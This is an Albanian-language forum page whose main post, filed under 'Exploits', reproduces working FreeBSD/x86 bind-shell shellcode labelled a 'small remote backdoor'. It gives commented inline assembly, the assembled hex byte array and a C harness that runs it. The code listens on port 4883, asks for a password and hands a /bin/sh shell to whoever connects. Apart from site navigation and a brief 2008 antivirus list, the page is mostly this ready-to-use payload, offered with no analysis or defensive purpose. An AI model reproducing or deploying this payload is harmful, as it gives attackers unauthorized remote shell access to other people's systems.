ForumPortaliGalleryPytėsoriKėrkoLista AnėtarėveGrupet e AnėtarėveRegjistrohuidentifikimi
...:::Meny Kryesore:::...
 Home
 Portali
 Forum
 Lista e Antarve
 Galeria
 Lajmet Flash
 Profili
 FAQ
 Testi I Dashuris
favoritos.gif Media & Muzika
 Telivizionet Live
 Video Klipe
 Ruzulltatet Sportive
 Mp3 Falass
 Mp3 RAP
 Kerkesa Muzikore
 Melodi Per Celular
icon_community.gif Argėtim-Zbavitje
 Video Humoristike
 Luani Lojra
 Dezing
 Poezi
 Gediche
 Argėtime
 Albumi Fotografik
 Tema tė Ndryshme
som_downloads.gif Shkarkime & Links
King-Rap Tolbar
Programe
Shkarko Scripte
Chat Programs
 Kėrko nė Forum
 Liderėt e forumit
 Ndihmė
 Kėrko
Moti Momental

Permbajta e ksaj faqe kerkon flash player per instalim kliko mbi ket tekst.


Futu nė chat

Top 5 softuerėt antivirus pėr 2008
HTML clipboard
Top 5 softuerėt antivirus pėr 2008

1. Bit Defender

2. Kaspersky

3. Eset NOD32

4. Trend Micro Antivirus

    plus AntiSpyware 

5. F-Secure Anti-Virus 

SMS Falas nga KING-RaP
Partnerėt
>>> AlBaZeMeR <<<

XoFaCe

->>Ks-MaX <<<---

->> KoSoVa.Li <<<---

 ->> Muzik-Anglisht <<<---

V.I.P Galeri

Top posters
kanuni
 
Xhebraili
 
vissari
 
El-Fuego
 
drini-89
 
RiRi
 
dj-baba
 
dosti
 
king
 
miri
 
Keywords
gashi nika shkronja numrin meda gjata loja double numri ismajli druri 2012 elvana PORNO komandat shqip BAJRAM dashurie kosoves nokia celular murlan anglisht dashuri genta krasniqi
IP Addressa Juaj&Reklama
IP


Share | 
 

 freebsd/x86 portbind 4883 with auth shellcode

Shiko temėn e mėparshme Shiko temėn pasuese Shko poshtė 
AutoriMesazh
El-Fuego



Numri i postimeve : 159
Join date : 12/06/2008
Age : 104
Location : Peja Morder City

MesazhTitulli: freebsd/x86 portbind 4883 with auth shellcode   Thu Jun 12, 2008 8:18 pm

/*
THE ZUGCODE - SMALL REMOTE 6ACKD0R
FreeBSD i386 bind shell with auth
code by MahDelin
Big thx SST [kaka, nolife, white]
Listen on the port 4883 the /bin/sh
*/

/*
void zugcode(void )
{
//socket
__asm__("xorl %eax, %eax");
__asm__("pushl %eax");
__asm__("pushl %eax");
__asm__("pushl $0x01");
__asm__("pushl $0x02");
__asm__("movl %esp, %ebp");
__asm__("pushl %ebp");
__asm__("movb $0x61, %al");
__asm__("int $0x80");

//struct sockaddr_in
__asm__("movl %eax, %edi");
__asm__("xorl %eax, %eax");
__asm__("movb $0x02, 9(%ebp)");
__asm__("movw $0x1313, 10(%ebp)");
__asm__("movl %eax, 12(%ebp)");
__asm__("leal 8(%ebp), %ecx");

//bind
__asm__("xor %ebx,%ebx");
__asm__("movb $0x10,%bl");
__asm__("push %ebx");
__asm__("push %ecx");
__asm__("push %edi");
__asm__("push %eax");
__asm__("movb $0x68, %al");
__asm__("int $0x80");

//listen
__asm__("xor %eax, %eax");
__asm__("pushl %eax");
__asm__("pushl $0x01");
__asm__("pushl %edi");
__asm__("pushl %eax");
__asm__("movb $0x6a, %al");
__asm__("int $0x80");

//accept
__asm__("xor %eax, %eax");
__asm__("push %ebx");
__asm__("pushl %eax");
__asm__("pushl %eax");
__asm__("pushl %edi");
__asm__("pushl %eax");
__asm__("movb $0x1e, %al");
__asm__("int $0x80");

__asm__("mov %eax, %esi");
__asm__("xor %eax, %eax");
__asm__("pushl $0x203a7465");
__asm__("pushl $0x72636573");
__asm__("movl %esp, %ebx");
__asm__("push %eax");
__asm__("push $0x8");
__asm__("pushl %ebx");
__asm__("push %esi");
__asm__("xor %eax, %eax");
__asm__("push %eax");
__asm__("movb $0x65, %al");
__asm__("int $0x80");

//rcev password
__asm__("xor %eax, %eax");
__asm__("pushl %ebp");
__asm__("movl %esp, %ebp");
__asm__("movb $0x20, %al");
__asm__("subl %eax, %esp");
__asm__("xor %eax, %eax");
__asm__("push %eax");
__asm__("mov $0x80, %al");
__asm__("push %eax");
__asm__("xor %eax, %eax");
__asm__("push %ebp");
__asm__("push %esi");
__asm__("push %eax");
__asm__("movb $0x66, %al");
__asm__("int $0x80");

//compare password
//save registers %esi, %edi
__asm__("mov %edi, %ebx");
__asm__("mov %esi, %edx");
__asm__("mov %eax, %ecx");
__asm__(".word 0x50eb");
__asm__("pop %esi");
__asm__("mov %ebp, %edi");
__asm__("repe cmpsb");
__asm__(".word 0x4275");
__asm__("mov %ebx, %edi");
__asm__("mov %edx, %esi");

//dup2 stdin
__asm__("xorl %eax, %eax");
__asm__("pushl %eax");
__asm__("pushl %esi");
__asm__("pushl %eax");
__asm__("movb $0x5a, %al");
__asm__("int $0x80");

//dup2 stdout
__asm__("xorl %eax, %eax");
__asm__("inc %eax");
__asm__("pushl %eax");
__asm__("pushl %esi");
__asm__("xorl %eax, %eax");
__asm__("pushl %eax");
__asm__("movb $0x5a, %al");
__asm__("int $0x80");

//dup2 stderr
__asm__("xorl %eax, %eax");
__asm__("add $0x2, %eax");
__asm__("pushl %eax");
__asm__("pushl %esi");
__asm__("xorl %eax, %eax");
__asm__("pushl %eax");
__asm__("movb $0x5a, %al");
__asm__("int $0x80");

// /bin/sh
__asm__("xor %ecx, %ecx");
__asm__("pushl %ecx");
__asm__("pushl $0x68732f2f");
__asm__("pushl $0x6e69622f");
__asm__("movl %esp, %ebx");
__asm__("pushl %ecx");
__asm__("pushl %ebx");
__asm__("movl %esp, %edx");
__asm__("pushl %ecx");
__asm__("pushl %edx");
__asm__("pushl %ebx");
__asm__("pushl %ecx");
__asm__("movb $0x3b, %al");
__asm__("int $0x80");

//exit
__asm__("xorl %eax, %eax");
__asm__("inc %eax");
__asm__("pushl %eax");
__asm__("pushl %eax");
__asm__("int $0x80");

__asm__(".byte 0xe8");
__asm__(".long 0xffffffab");
__asm__(".asciz \"payhash\12\"");
}
*/

unsigned char zug[] =
"\x31\xc0\x50\x50\x6a\x01\x6a\x02\x89\xe5\x55\xb0\x61\xcd\x80\x89\xc7\x31"
"\xc0\xc6\x45\x09\x02\x66\xc7\x45\x0a\x13\x13\x89\x45\x0c\x8d\x4d\x08\x31"
"\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80\x31\xc0\x50\x6a\x01\x57\x50"
"\xb0\x6a\xcd\x80\x31\xc0\x53\x50\x50\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31"
"\xc0\x68\x65\x74\x3a\x20\x68\x73\x65\x63\x72\x89\xe3\x50\x6a\x08\x53\x56"
"\x31\xc0\x50\xb0\x65\xcd\x80\x31\xc0\x55\x89\xe5\xb0\x20\x29\xc4\x31\xc0"
"\x50\xb0\x80\x50\x31\xc0\x55\x56\x50\xb0\x66\xcd\x80\x89\xfb\x89\xf2\x89"
"\xc1\xeb\x50\x5e\x89\xef\xf3\xa6\x75\x42\x89\xdf\x89\xd6\x31\xc0\x50\x56"
"\x50\xb0\x5a\xcd\x80\x31\xc0\x40\x50\x56\x31\xc0\x50\xb0\x5a\xcd\x80\x31"
"\xc0\x83\xc0\x02\x50\x56\x31\xc0\x50\xb0\x5a\xcd\x80\x31\xc9\x51\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x53\x89\xe2\x51\x52\x53\x51"
"\xb0\x3b\xcd\x80\x31\xc0\x40\x50\x50\xcd\x80\xe8\xab\xff\xff\xff\x70\x61"
"\x79\x68\x61\x73\x68\x0a";

main()
{
int (*zugcode)();
printf("shellcode len, %d bytes\n", strlen(zug));
zugcode = (int (*)()) zug;
(int)(*zugcode)();
}
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit
 
freebsd/x86 portbind 4883 with auth shellcode
Shiko temėn e mėparshme Shiko temėn pasuese Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: ..:: INFORMATIKA ::.. :: Exploits-
Kėrce tek: